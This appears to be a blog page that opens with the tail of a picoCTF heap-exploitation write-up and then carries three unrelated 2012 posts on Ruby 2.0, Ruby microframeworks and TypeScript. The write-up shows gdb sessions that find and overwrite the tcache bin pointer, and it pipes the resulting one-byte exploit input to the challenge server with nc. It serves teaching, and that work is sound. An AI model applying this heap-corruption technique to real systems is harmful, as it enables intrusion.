0x00000000004009a8 <+417>: mov rax,QWORD PTR [rbp-0x80]
0x00000000004009ac <+421>: mov rdi,rax
0x00000000004009af <+424>: call 0x400680 <free@plt>
The address to the last freed chunk is stored in rbp-0x80
. So we can also get the address of the heap chunk via rbp-0x80
.
gef➤ p *((void**)($rbp-0x80))
$8 = (void *) 0x603890
The Exploit
Now that we… umm… “understand” the tcache
, we can finally talk about the exploit. The goal is for the malloc
at the end to recycle the first_malloc_data
instead of the random_data
chunk. What we now know:
- We have to try to rewrite the
tcache bin
pointer to point to flag_data
instead of random_data
.
- We also know that we can overwrite one byte, relative to another pointer in the heap via
first_malloc_data[address] = new_byte
.
- The difference between the two chunk addresses of
flag_data
and random_data
is exactly one byte (0x603800
and 0x603890
).
Everything seems to line up quiet well! Like someone planned this…
I will first exploit the binary locally with gdb
, to ensure we really understand the challenge and can verify that it actually works. Afterwards I will generalize the exploit to make it runnable remotely.
Dry Run
First, we need to know the location of the tcache bin ptr
(I will try to be consistent in using tcache bin
pointer to denote where the tcache bin
pointer is pointing to and tcache bin ptr
to denote the location in memory of the tcache bin ptr
itself). Logic dictates that the tcache bin ptr
has to be somewhere in memory. Otherwise the allocator would not know where to insert the next element on a free
or where to take a chunk from when malloc
is called. It is also save to assume that the pointer has to be somewhere in the heap, as the allocator cannot rely on the stack for its pointers. Let’s search for it!
We continue with the gdb session started above, where the debugger is still waiting after the second free. First we need to know where the [heap]
is in our process memory.
gef➤ info proc mappings
process 1343
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x400000 0x401000 0x1000 0x0 /home/picoctf/cache-me-outside/heapedit
0x600000 0x601000 0x1000 0x0 /home/picoctf/cache-me-outside/heapedit
0x601000 0x602000 0x1000 0x1000 /home/picoctf/cache-me-outside/heapedit
0x602000 0x623000 0x21000 0x0 [heap]
0x7ffff79e4000 0x7ffff7bcb000 0x1e7000 0x0 /home/picoctf/cache-me-outside/libc.so.6
0x7ffff7bcb000 0x7ffff7dcb000 0x200000 0x1e7000 /home/picoctf/cache-me-outside/libc.so.6
0x7ffff7dcb000 0x7ffff7dcf000 0x4000 0x1e7000 /home/picoctf/cache-me-outside/libc.so.6
0x7ffff7dcf000 0x7ffff7dd1000 0x2000 0x1eb000 /home/picoctf/cache-me-outside/libc.so.6
0x7ffff7dd1000 0x7ffff7dd5000 0x4000 0x0
0x7ffff7dd5000 0x7ffff7dfc000 0x27000 0x0 /home/picoctf/cache-me-outside/ld-2.27.so
0x7ffff7ff4000 0x7ffff7ff6000 0x2000 0x0
0x7ffff7ff6000 0x7ffff7ffa000 0x4000 0x0 [vvar]
0x7ffff7ffa000 0x7ffff7ffc000 0x2000 0x0 [vdso]
0x7ffff7ffc000 0x7ffff7ffd000 0x1000 0x27000 /home/picoctf/cache-me-outside/ld-2.27.so
0x7ffff7ffd000 0x7ffff7ffe000 0x1000 0x28000 /home/picoctf/cache-me-outside/ld-2.27.so
0x7ffff7ffe000 0x7ffff7fff000 0x1000 0x0
0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack]
The heap lives between 0x602000
and 0x623000
. As seen above, the last chunk inserted into the tcache
is at 0x603890
. If the tcache bin ptr
lives in the heap, we should find somewhere between 0x602000
and 0x623000
the value 0x603890
. With gdb
, we can search for it.
gef➤ find 0x602000, 0x623000, 0x603890
0x602088
warning: Unable to access 7029 bytes of target memory at 0x62148c, halting search.
1 pattern found.
The tcache bin ptr
is stored in the heap at 0x602088
. We can also verify this.
gef➤ x/x 0x602088
0x602088: 0x0000000000603890
To make our exploit work, we need to change the address of the tcache bin ptr
(at 0x602088
) from pointing to the random_data
chunk (at 0x603890
) to pointing to the flag_data
chunk (at 0x603800
). Luckily, this means changing one byte from 0x90
to 0x00
.
Let’s first validate our understanding manually and change the address via gdb
.
gef➤ set {void*}0x602088 = 0x0000000000603800
gef➤ x 0x602088
0x602088: 0x0000000000603800
gef➤ heap bins tcache
──────── Tcachebins for arena 0x7ffff7dcfc40 ────────
Tcachebins[idx=7, size=0x90] count=2 ← Chunk(addr=0x603800, size=0x90, flags=PREV_INUSE)
We first update the pointer with set
, spot-check that the value is really overwritten and then check with heap bins tcache
the new layout of the tcache
. As we can see, we now only have one value in it. asideEagled eyed folks might notice the count=2
. The metadata is now screwed up, but the program only makes one more malloc
, so it does not matter here. When running the program now, it outputs the flag, independent of what inputs we give it.
gef➤ c
Continuing.
You may edit one byte in the program.
Address: AAAA
Value: lag is: iamaflag
Perfect! We validated our approach. Next up, we need to be able to execute this from the command line without gdb
.
Generalize Exploit
Now that we know that we can overwrite a single byte to get the flag, we need to figure out how to overwrite that byte with just the inputs to the program (address and new byte). Let’s first have a look at the relevant code again.
address = 0;
new_byte = '\0';
puts("You may edit one byte in the program.");
printf("Address: ");
__isoc99_scanf("%d",&address); // (10)
printf("Value: ");
__isoc99_scanf(" %c",&new_byte); // (11)
first_malloc_data[address] = new_byte;
last_malloc = (char **)malloc(0x80);
puts((char *)(last_malloc + 2)); // (12)
We give it an address (from now on, I will call it an offset, as it is not an address, it is an offset!) and a new byte. It will then write the new byte to first_malloc_data[address]
.
This is very convenient for us. Normally, in a heap exploit, we would need a leak of a heap address as the heap will not always be placed at the same address. Is it hopeless? Or course not! While the address (and the position of the heap) is random, the position of chunks inside the heap is stable. If a chunk is 0x1337 from another address in the heap, it will always be 0x1337 from that other address, in each and every run. If we can leak an address in the heap — a heap address leak —, we can simply calculate the offset locally. The offset will be correct no matter where the program is run. The first_malloc_data
acts as a free heap address leak.
The heap looks something like this:
┌──────────────────┐
│ start of heap │
├──────────────────┤
│ ... │
├──────────────────┤
│ tcache bin ptr │
├──────────────────┤ ▲
│ │ │
│ ... │ │offset
│ │ │
├──────────────────┤ ▼
│first_malloc_data │
├──────────────────┤
│ │
│ │
│ ... │
│ │
│ │
│ │
│ │
├──────────────────┤
│ end of heap │
└──────────────────┘
To write the byte at to the correct location in the heap, we need to know the offset between first_malloc_data
and the tcache bin ptr
, so we can use that as the address input to the program. We know where tcache bin ptr
is stored (0x602088
), but we also need the address of first_malloc_data
. According to the disassembly (either in ghidra
or gdb
) it is stored in rbp-0x98
(for example visible in the gdb
disassembly at main+212
). Getting the address with gdb
:
gef➤ p *((void**)($rbp-0x98))
$10 = (void *) 0x6034a0
Now we can calculate the offset between the two.
gef➤ p/d 0x602088-0x6034a0
$12 = -5144
So we subtract 5144 to get from the address of first_malloc_data
to the to the address oftcache bin ptr
. To change the pointer from 0x603890
to 0x603800
, we need to overwrite the last byte. As we are running on x64, which uses LSB, it will be the first byte at that address (as the value 0x603890 on a 64bit LSB system will be stored as 0x9038600000000000). The inputs to the program should result in first_malloc_data[-5144] = '0x00'
, or -5144
for the address, and 0x00
for the new byte.
$ echo "-5144\n\x00\n\n" | ./heapedit
You may edit one byte in the program.
Address: Value: lag is: iamaflag
And we get the flag!
We can run the same thing remotely as well.
$ echo "-5144\n\x00\n\n" | nc mercury.picoctf.net 31153
You may edit one byte in the program.
Address: Value: lag is: picoCTF{...}
29 Oct 2012
Yes, you read right:
Ruby 2.0 is in feature freeze! This doesn't mean it will be released in the next month. But it introduces us the most important changes that will come with version 2.0.
The timing is actually pretty impressive, since this feature freeze was announcement by Yusuke Endoh one year ago! Ruby seems to be on track (pun totally intended)! Want more details? Read on!
The Release Plan
Right now, there are two important milestones left: Code freeze and release. Code freeze is planned at the end of the year. So all the bugs should be more or less ironed out by then.
And then, on February 02, 2013,
20 years after Ruby became part of this world,
Ruby 2.0 should be released!
The New Features
There isn't yet an official list out with all the new features, but the source code, commit history and discussions are open to the public, so it is no secret!
This isn't a big release as the change from 1.9 to 2.0 would suggest, there are only a handful of new features:
Refinements
Refinements are one of the more interesting changes that could actually change the way Ruby code is written.
It allows you to monkey patch a class, but only where you want to, and not in the global scope.
Monkey patching could actually become an accepted thing to do!
Some code? Sure:
module StringExt
refine String
def length
42
end
end
end
Here we define a module that contains a refinement (
refine) for String. Because length should always be 42 (for whatever reason...). Let's define a class that could use it:
class TheAnswerToLifeTheUniverseAndEverything
def self.answer(the_question)
the_question.length
end
end
But that is wrong! And that's right. No, wait, I mean, the
answer is wrong, but the rest is right. That's because we didn't use the refinement yet, we just defined it.
Let's use it then:
class TheAnswerToLifeTheUniverseAndEverything
using StringExt
def self.answer(the_question)
the_question.length
end
end
If we ask for
TheAnswerToLifeTheUniverseAndEverything.answer("I want the answer to everything!!! NOOOOOW") it will tell us 42. Exactly what we want. But the behavior of
String#length outside of our class hasn't changed. At all! Only when we use it inside class that is using this refinement is the behavior changed.
Which could be really handy!
Named Arguments
Another one that we might end seeing a lot is named arguments. Named arguments could replace the options hash that is so prevalent in todays Ruby code. Use
def namedParameters?(yes: true, no: false) [...] end.
Then there are some internal changes and some speed improvements for MRI. Nothing exciting, but definitely good changes.
Will It Break Stuff?
Most likely? No. The most likely candidate to break stuff?
respond_to?.
The behavior of
respond_to? in regards to protected methods has changed. By default, in 2.0, it doesn't search for private or protected methods, in Ruby 1.9 it only excludes private methods.
The amazing Tenderlove has a great writeup about this.
Apart from that, it seems like there is nothing else that will break with Ruby 2.0, so the upgrade should be easier then going from 1.8 to 1.9.
Even though the roadmap is actually pretty big!
Yay! Exciting Stuff!
I'm looking forward to Ruby 2.0. I'm especially interested in what kind of clever hacks people will come up with now that we have refinements.
What are you looking forward to? What is still missing in your opinion?
If you liked this post, you should consider hiring me freelance, part-time or full-time!
13 Oct 2012
To answer the question directly (aka a TLDR here for the impatient): I don't know. Read on! (HA! Tricked you there!)
Let's take a dive through some Ruby web frameworks. There is one or two around, even if we don't count Rails. I promise!
But First, Let's Take The Rails
You know, I'm from Switzerland. We love the Railway here. We take it everywhere. It's our go to solution. Why? It offers everything we need, it is on time, and we can precisely plan when we will be at the destination.
Like Rails! It is the go to solution, exactly because it offers so much stuff. Want migrations? It's right there! Want an asset pipeline? It's right there! Want to use SASS? It's right there! Architecture? Done. Validations? Done. ORM? Done. Security? Done.
This is really nice! And we know that it might not be the quickest way to get somewhere, but it will surely get us there in a hell of a good time and still can continue from there. There are no dead ends!
If you are American, I'm sorry. I know you probably don't get why calling Rails after the Railway is a good and apt metaphor. So come visit Switzerland, get a good local beer with me and I will show you why!
Onwards, To Cuba!
Cuba! Where you can really do whatever you want. Welcome to the island of simpler times. The island where everything still seems easy.
Cuba doesn't have too many complicated processes. Everything can be done, as long as you do it yourself.
Welcome to
Cuba, the Ruby microframework. Using Cuba is real easy:
require "cuba"
Cuba.use Rack::Session::Cookie
Cuba.define do
on get do
on "hello" do
res.write "Hello world!"
end
on root do
res.redirect "/hello"
end
end
end
Yes, that's it! Inspired by
Sinatra? Maybe. It offers a few other things, like security or template handling through
Tilt.
A very simple, and laid back framework. Very fitting for Cuba.
Lets Go Camping
But of course, now that we are in Cuba, let's go camping! This way, we can see the landscape. We can see the world like it really is, unfiltered. And it is healthy, too!
Don't know how to set up your tent? No problem, maybe the
Camping framework can help:
Camping.goes :Tent
module Tent::Models
class Tarpaulin < Base; end
end
module Tent::Controllers
class Index
def get
@tarpaulins = Tarpaulin.all
render :index
end
end
end
module Tent::Views
def index
@tarpaulins.each do |tarpaulin|
h1 tarpaulin.size
div { tarpaulin.color }
end
end
end
Yep, that's it. Very Rails inspired, isn't it? But it makes sense, because going camping with the train makes a lot more sense! And yes, it is all in one file. Including MVC, including routes, including everything!
But will it replace Rails? I don't think so.
All That Traveling Gives Me A Cramp
Already? A cramp? We just traveled a bit around Cuba and you have already a cramp? I guess it was time to get you out of your comfort zone!
Ah, that damn cramp. This is something special. But lucky for us, we don't have to wait until your cramp recedes, we can just continue. Nice, isn't it?
Don't know why we can continue even while you have a
Cramp? See for yourself:
require 'cramp'
class GoHomeAction < Cramp::Action
def start
render "Let's Go Home"
finish
end
end
Yup, that's it. The cool thing about Cramp? It is designed for asynchronous requests right out of the box. It is very simple, but powerful, if used the right way.
But, since walking around with a cramp isn't fun, maybe it's time that we head home.
Home Sweet Home
Welcome back! I hope you enjoyed this tour around the (Ruby) world. I know I did! So to answer the question that the title was asking all along: Probably not, since all these other frameworks target another niche.
Will something replace Rails? I don't know. Rails has a lot of convenience built it that it just a burden to lose. And I don't think we will see a new full featured web framework soon. But these micro frameworks are really nice for the small niche that they chose to fill.
So for very small apps, maybe Rails isn't the right choice. For bigger ones? I still think the convenience of Rails can't be topped by these small frameworks.
If you liked this post, you should consider hiring me freelance, part-time or full-time!
08 Oct 2012
Interesting. Microsoft recently released their own version of JavaScript,
TypeScript! Now, some people might want to mock Microsoft for that. Maybe they just couldn't make Visual Studio play nice with JavaScript, so they made TypeScript. Oh wait!
I am one of those people!
Naah, let's be serious here. TypeScript is something like CoffeeScript. It does less and more. It offers "proper" type support and a class system. They don't touch any syntax however.
At first I simply wanted to introduce TypeScript, but it turned out in fact I just wanted to rant about how wrong Microsoft is once again in trying to introduce their own standards.
An Example, Please!
Sure, judge for yourself:
class Greeter {
greeting: string;
constructor (message: string) {
this.greeting = message;
}
greet() {
return "Hello, " + this.greeting;
}
}
var greeter = new Greeter("world");
var button = document.createElement('button')
button.innerText = "Say Hello"
button.onclick = function() {
alert(greeter.greet())
}
document.body.appendChild(button)
(Taken straight from their
documentation)
So this is basically JavaScript syntax. All braces are kept intact. Except it introduces classes and types, that will be checked during compilation.
So, Why?
Apparently,
some people working for Microsoft had problems with JavaScript. Which is fair, since I guess we all have problems with JavaScript sometimes. Microsoft solution? Make our own JavaScript!
Because, let's be honest, this worked so well with a lot of stuff they did, like, oh, ActiveX... or OOXML.
Why Does Microsoft Need Its Own Stuff Again?
I honestly have no idea. No idea whatsoever! It doesn't make any sense. We have CoffeeScript. If they wanted to back a JavaScript replacement with types, why not back
Google's Dart? It would make a lot more sense.
But no, Microsoft had to introduce its own stuff again. Why will remain a mystery, probably forever.
Will This Succeed?
Probably. Why? Simply because in Microsoft world, people love Microsoft stuff. Nothing wrong with that, it is convenient. And if Microsoft backs something, this means people will probably pick it up.
The integration into Visual Studio, the IDE of choice for Microsoft programmers, will probably have superb support for TypeScript, including refactoring and all the other goodies that people expect from IDEs these days.
So yes, I think a few people will pick it up, just because it is bundled. The same way that a lot of Rubyists picked up SASS, or CoffeeScript, simply because it comes bundles with Rails. And yes, I know, not every Rubyist uses Rails, sorry 'bout that!
You Don't Like It, Right?
Well, no. It doesn't offer enough new stuff that we could consider this a new awesome thing that could change the landscape of web programming. In fact, I don't think it offers anything new.
So no, I don't like it. I don't like it when companies waste good, sparse programming talent. Why couldn't Microsoft back Dart? Than that language would suddenly be huge! If Chrome and Internet Explorer come with proper Dart support, Mozilla would have no choice but to back it too!
But no, this way we, again, have multiple "standards" that aren't interoperable. We will have another fight on our hands with Google pushing for Dart, Microsoft for TypeScript, and Mozilla (maybe) for CoffeeScript.
Does this remind anyone else of web codecs?
No, no, and no. I do not agree with that decision by Microsoft. I think its wrong, bad, and it definitely won't help move the web forward. In fact, it pushes it backwards.
So sorry. No.